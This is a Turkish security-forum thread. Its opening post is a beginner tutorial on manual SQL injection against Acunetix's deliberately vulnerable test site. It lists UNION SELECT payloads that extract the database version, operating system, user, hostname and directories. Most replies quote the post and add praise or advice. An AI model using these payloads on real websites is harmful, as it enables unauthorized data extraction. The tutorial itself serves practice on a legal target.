Sql Enjeksiyon Zafiyetini Kullanalım

Rapx13

Rapx13

Anka Team Junior
1 Kas 2023
140
61
Atamın İzinde
m9RCVr.png


Selamlar Ben Anka Team Junior'dan Rapx13. Bugün sizlere manuel olarak sql enjeksiyon açığı bulunan bir siteden araç kullanmdan komutlarla bilgi çekmeyi göstericeğim.

SQL Nedir ?

iwxqmay.png


1*8z9kgCGk4135r3F5VWAVag.png


SQL (yapılandırılmış sorgu dili) demektir. Adındanda anlaşılcağı için veri aktarımı yazılmış bir alt dildir.


kbrn6ph.png


SQL Enjeksiyon Zafiyeti Nedir ?

iwxqmay.png


Genellikle bu açığı kullananlar ona SQLİ derler. Bu açık öyle bi açıktırki açıklar listesinde bi aralar en üst sıradaydı
(hala öylemi bilmiyorum) Bu açıktaki olay görülmemesi gerek verilerin görülmesine sebebiyet vermesidir.
Örneğin sitenizde sizin sunucunuzun ip adresi veya işletim sistemi gibi şeylerin gözükmesi pek hoş olmaz dimi
İşte bu açık böyle bişey. Bizde bugün bunu inceleyip bilgi toplayacağız.

prbhdmh.png


İlk olarak Bu işlemi Acunetix yani test vulnwebde yapıcağım yani herhangi bir suç teşkil etmiyicek.
Bu arada çektiğim videoda tables demişim heyecandan kolon olucak o.

Videoda kullandığım parametreler :

1- testphp.vulnweb.com/artists.php?artist=1' (zafiyet varsa hata vermesi için)

2- testphp.vulnweb.com/artists.php?artist=1 and 1=1 sorgu döndü 1=2 olursa dönmez hata verir açık var.

3- testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 yazınca 3. kolonda açık olduğunu söylüyor.

4- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version() yazınca versiyon bilgisini verir.

5- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_comment. üsttekiyle nerdeyse aynısı.

6- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version_compile_os. işletim sistemini verir.

7- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_compile_machine. mimari bilgisini verir.

8- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,database() uygulama veri tabanını verir.

9- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,user() veri tabanı kullanıcısını verir

10- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@port mysql portunu verir.

11- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@hostname ana sistemin adını verir.

12- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@besedir mysql sunucusunun bulunduğu dizini verir.

13- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@DATADIR mysql datasının bulunduğu dizini verir.

14- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@wait_timeout bir sorgu süresini ekrana yazar.

kbrn6ph.png


İzlemek isteyen olursa diye video Daily Motion Linki

logo.png

lbn20fm.png



 
teux

teux

Ar-Ge Ekibi Asistanı
23 Ocak 2023
979
1,490
Rapx13' Alıntı:
m9RCVr.png


Selamlar Ben Anka Team Junior'dan Rapx13. Bugün sizlere manuel olarak sql enjeksiyon açığı bulunan bir siteden araç kullanmdan komutlarla bilgi çekmeyi göstericeğim.

SQL Nedir ?

iwxqmay.png


1*8z9kgCGk4135r3F5VWAVag.png


SQL (yapılandırılmış sorgu dili) demektir. Adındanda anlaşılcağı için veri aktarımı yazılmış bir alt dildir.


kbrn6ph.png


SQL Enjeksiyon Zafiyeti Nedir ?

iwxqmay.png


Genellikle bu açığı kullananlar ona SQLİ derler. Bu açık öyle bi açıktırki açıklar listesinde bi aralar en üst sıradaydı
(hala öylemi bilmiyorum) Bu açıktaki olay görülmemesi gerek verilerin görülmesine sebebiyet vermesidir.
Örneğin sitenizde sizin sunucunuzun ip adresi veya işletim sistemi gibi şeylerin gözükmesi pek hoş olmaz dimi
İşte bu açık böyle bişey. Bizde bugün bunu inceleyip bilgi toplayacağız.

prbhdmh.png


İlk olarak Bu işlemi Acunetix yani test vulnwebde yapıcağım yani herhangi bir suç teşkil etmiyicek.
Bu arada çektiğim videoda tables demişim heyecandan kolon olucak o.

Videoda kullandığım parametreler :

1- testphp.vulnweb.com/artists.php?artist=1' (zafiyet varsa hata vermesi için)

2- testphp.vulnweb.com/artists.php?artist=1 and 1=1 sorgu döndü 1=2 olursa dönmez hata verir açık var.

3- testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 yazınca 3. kolonda açık olduğunu söylüyor.

4- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version() yazınca versiyon bilgisini verir.

5- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_comment. üsttekiyle nerdeyse aynısı.

6- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version_compile_os. işletim sistemini verir.

7- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_compile_machine. mimari bilgisini verir.

8- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,database() uygulama veri tabanını verir.

9- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,user() veri tabanı kullanıcısını verir

10- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@port mysql portunu verir.

11- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@hostname ana sistemin adını verir.

12- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@besedir mysql sunucusunun bulunduğu dizini verir.

13- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@DATADIR mysql datasının bulunduğu dizini verir.

14- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@wait_timeout bir sorgu süresini ekrana yazar.

kbrn6ph.png


İzlemek isteyen olursa diye video Daily Motion Linki

logo.png

lbn20fm.png



Genişletmek için tıkla ...
SQLi gibi derin ve detaylı bir zafiyeti bu kadar üstünkörü anlatmanız pek hoş olmamış,
Eline sağlık.
 
zarobey123

zarobey123

Yeni üye
26 May 2024
23
2
Rapx13' Alıntı:
m9RCVr.png


Selamlar Ben Anka Team Junior'dan Rapx13. Bugün sizlere manuel olarak sql enjeksiyon açığı bulunan bir siteden araç kullanmdan komutlarla bilgi çekmeyi göstericeğim.

SQL Nedir ?

iwxqmay.png


1*8z9kgCGk4135r3F5VWAVag.png


SQL (yapılandırılmış sorgu dili) demektir. Adındanda anlaşılcağı için veri aktarımı yazılmış bir alt dildir.


kbrn6ph.png


SQL Enjeksiyon Zafiyeti Nedir ?

iwxqmay.png


Genellikle bu açığı kullananlar ona SQLİ derler. Bu açık öyle bi açıktırki açıklar listesinde bi aralar en üst sıradaydı
(hala öylemi bilmiyorum) Bu açıktaki olay görülmemesi gerek verilerin görülmesine sebebiyet vermesidir.
Örneğin sitenizde sizin sunucunuzun ip adresi veya işletim sistemi gibi şeylerin gözükmesi pek hoş olmaz dimi
İşte bu açık böyle bişey. Bizde bugün bunu inceleyip bilgi toplayacağız.

prbhdmh.png


İlk olarak Bu işlemi Acunetix yani test vulnwebde yapıcağım yani herhangi bir suç teşkil etmiyicek.
Bu arada çektiğim videoda tables demişim heyecandan kolon olucak o.

Videoda kullandığım parametreler :

1- testphp.vulnweb.com/artists.php?artist=1' (zafiyet varsa hata vermesi için)

2- testphp.vulnweb.com/artists.php?artist=1 and 1=1 sorgu döndü 1=2 olursa dönmez hata verir açık var.

3- testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 yazınca 3. kolonda açık olduğunu söylüyor.

4- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version() yazınca versiyon bilgisini verir.

5- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_comment. üsttekiyle nerdeyse aynısı.

6- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version_compile_os. işletim sistemini verir.

7- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_compile_machine. mimari bilgisini verir.

8- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,database() uygulama veri tabanını verir.

9- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,user() veri tabanı kullanıcısını verir

10- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@port mysql portunu verir.

11- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@hostname ana sistemin adını verir.

12- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@besedir mysql sunucusunun bulunduğu dizini verir.

13- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@DATADIR mysql datasının bulunduğu dizini verir.

14- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@wait_timeout bir sorgu süresini ekrana yazar.

kbrn6ph.png


İzlemek isteyen olursa diye video Daily Motion Linki

logo.png

lbn20fm.png



Genişletmek için tıkla ...
elinize sağlık.
 
Liprow

Liprow

Katılımcı Üye
15 Şub 2021
417
534
Yorumlara takılma kardeşim, gayet güzel bir yerden başlangıç yapmışsın. Veritabanı ve ağ yapısını, dizin bilgisini, kullanıcı yetkilerini, buna benzer bir çok şeyi bilmeden ezber niteliğinde parametre uygulayan kişilerin "neden olmuyor?" sorusuna cevap niteliğindedir bu sorgular. Kendini geliştirmen açısından başka dbms türlerinde ki farklılıklarını araştır. Örneğin konuna bakıp database() sorgusu yapan bir kişi ordbms tabanlıda sorgusuna cevap gelmeyince waf olduğunu sanmasın. Veya iki saat panel bilgisi arayanların bu sorgularla root yetkisine erişe bileceği bir ortam yarat. Hadi kolay gelsin..
 
Rapx13

Rapx13

Anka Team Junior
1 Kas 2023
140
61
Atamın İzinde
Liprow' Alıntı:
Yorumlara takılma kardeşim, gayet güzel bir yerden başlangıç yapmışsın. Veritabanı ve ağ yapısını, dizin bilgisini, kullanıcı yetkilerini, buna benzer bir çok şeyi bilmeden ezber niteliğinde parametre uygulayan kişilerin "neden olmuyor?" sorusuna cevap niteliğindedir bu sorgular. Kendini geliştirmen açısından başka dbms türlerinde ki farklılıklarını araştır. Örneğin konuna bakıp database() sorgusu yapan bir kişi ordbms tabanlıda sorgusuna cevap gelmeyince waf olduğunu sanmasın. Veya iki saat panel bilgisi arayanların bu sorgularla root yetkisine erişe bileceği bir ortam yarat. Hadi kolay gelsin..
Genişletmek için tıkla ...
Eyvallah hocam canımsın ❤️ öneriler için teşekkür ederim.
 
mumyy

mumyy

Yeni üye
28 Ağu 2011
16
3
Çekirdekten
Zaten bunlarla alakalı ezbere dayalı gidilir ve sonrasında pratikleşirse araç kullanmadan da manuel olarak öğrenebilmemizin yolunu @Rapx13 detaylıca göstermiş. Kendisine teşekkür ederim.
 
LydexCoding

LydexCoding

Katılımcı Üye
24 May 2024
431
140
:)
Rapx13' Alıntı:
m9RCVr.png


Selamlar Ben Anka Team Junior'dan Rapx13. Bugün sizlere manuel olarak sql enjeksiyon açığı bulunan bir siteden araç kullanmdan komutlarla bilgi çekmeyi göstericeğim.

SQL Nedir ?

iwxqmay.png


1*8z9kgCGk4135r3F5VWAVag.png


SQL (yapılandırılmış sorgu dili) demektir. Adındanda anlaşılcağı için veri aktarımı yazılmış bir alt dildir.


kbrn6ph.png


SQL Enjeksiyon Zafiyeti Nedir ?

iwxqmay.png


Genellikle bu açığı kullananlar ona SQLİ derler. Bu açık öyle bi açıktırki açıklar listesinde bi aralar en üst sıradaydı
(hala öylemi bilmiyorum) Bu açıktaki olay görülmemesi gerek verilerin görülmesine sebebiyet vermesidir.
Örneğin sitenizde sizin sunucunuzun ip adresi veya işletim sistemi gibi şeylerin gözükmesi pek hoş olmaz dimi
İşte bu açık böyle bişey. Bizde bugün bunu inceleyip bilgi toplayacağız.

prbhdmh.png


İlk olarak Bu işlemi Acunetix yani test vulnwebde yapıcağım yani herhangi bir suç teşkil etmiyicek.
Bu arada çektiğim videoda tables demişim heyecandan kolon olucak o.

Videoda kullandığım parametreler :

1- testphp.vulnweb.com/artists.php?artist=1' (zafiyet varsa hata vermesi için)

2- testphp.vulnweb.com/artists.php?artist=1 and 1=1 sorgu döndü 1=2 olursa dönmez hata verir açık var.

3- testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 yazınca 3. kolonda açık olduğunu söylüyor.

4- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version() yazınca versiyon bilgisini verir.

5- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_comment. üsttekiyle nerdeyse aynısı.

6- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version_compile_os. işletim sistemini verir.

7- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_compile_machine. mimari bilgisini verir.

8- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,database() uygulama veri tabanını verir.

9- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,user() veri tabanı kullanıcısını verir

10- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@port mysql portunu verir.

11- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@hostname ana sistemin adını verir.

12- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@besedir mysql sunucusunun bulunduğu dizini verir.

13- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@DATADIR mysql datasının bulunduğu dizini verir.

14- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@wait_timeout bir sorgu süresini ekrana yazar.

kbrn6ph.png


İzlemek isteyen olursa diye video Daily Motion Linki

logo.png

lbn20fm.png



Genişletmek için tıkla ...
Ellerinize sağlık hocam.
 
xzh

xzh

Üye
8 Nis 2020
232
83
Olayın mantığı, yazılımcı düşüncesi vb konuların işleyişinin olmaması olayı ezbere dayalı bir uygulama olarak sağlamış.
 
aslnbkr27

aslnbkr27

Katılımcı Üye
24 Eyl 2023
271
225
#BlackHatTeam
Liprow' Alıntı:
Yorumlara takılma kardeşim, gayet güzel bir yerden başlangıç yapmışsın. Veritabanı ve ağ yapısını, dizin bilgisini, kullanıcı yetkilerini, buna benzer bir çok şeyi bilmeden ezber niteliğinde parametre uygulayan kişilerin "neden olmuyor?" sorusuna cevap niteliğindedir bu sorgular. Kendini geliştirmen açısından başka dbms türlerinde ki farklılıklarını araştır. Örneğin konuna bakıp database() sorgusu yapan bir kişi ordbms tabanlıda sorgusuna cevap gelmeyince waf olduğunu sanmasın. Veya iki saat panel bilgisi arayanların bu sorgularla root yetkisine erişe bileceği bir ortam yarat. Hadi kolay gelsin..
Genişletmek için tıkla ...
İsminiz bir yerden tanıdık geliyor hocam :D ❤️
 
legandrary

legandrary

Üye
24 Ağu 2023
165
34
Arkandayım
Rapx13' Alıntı:
m9RCVr.png


Selamlar Ben Anka Team Junior'dan Rapx13. Bugün sizlere manuel olarak sql enjeksiyon açığı bulunan bir siteden araç kullanmdan komutlarla bilgi çekmeyi göstericeğim.

SQL Nedir ?

iwxqmay.png


1*8z9kgCGk4135r3F5VWAVag.png


SQL (yapılandırılmış sorgu dili) demektir. Adındanda anlaşılcağı için veri aktarımı yazılmış bir alt dildir.


kbrn6ph.png


SQL Enjeksiyon Zafiyeti Nedir ?

iwxqmay.png


Genellikle bu açığı kullananlar ona SQLİ derler. Bu açık öyle bi açıktırki açıklar listesinde bi aralar en üst sıradaydı
(hala öylemi bilmiyorum) Bu açıktaki olay görülmemesi gerek verilerin görülmesine sebebiyet vermesidir.
Örneğin sitenizde sizin sunucunuzun ip adresi veya işletim sistemi gibi şeylerin gözükmesi pek hoş olmaz dimi
İşte bu açık böyle bişey. Bizde bugün bunu inceleyip bilgi toplayacağız.

prbhdmh.png


İlk olarak Bu işlemi Acunetix yani test vulnwebde yapıcağım yani herhangi bir suç teşkil etmiyicek.
Bu arada çektiğim videoda tables demişim heyecandan kolon olucak o.

Videoda kullandığım parametreler :

1- testphp.vulnweb.com/artists.php?artist=1' (zafiyet varsa hata vermesi için)

2- testphp.vulnweb.com/artists.php?artist=1 and 1=1 sorgu döndü 1=2 olursa dönmez hata verir açık var.

3- testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 yazınca 3. kolonda açık olduğunu söylüyor.

4- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version() yazınca versiyon bilgisini verir.

5- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_comment. üsttekiyle nerdeyse aynısı.

6- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version_compile_os. işletim sistemini verir.

7- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_compile_machine. mimari bilgisini verir.

8- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,database() uygulama veri tabanını verir.

9- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,user() veri tabanı kullanıcısını verir

10- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@port mysql portunu verir.

11- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@hostname ana sistemin adını verir.

12- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@besedir mysql sunucusunun bulunduğu dizini verir.

13- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@DATADIR mysql datasının bulunduğu dizini verir.

14- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@wait_timeout bir sorgu süresini ekrana yazar.

kbrn6ph.png


İzlemek isteyen olursa diye video Daily Motion Linki

logo.png

lbn20fm.png



Genişletmek için tıkla ...
Eline sağlık hocam yararlı bir konu
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.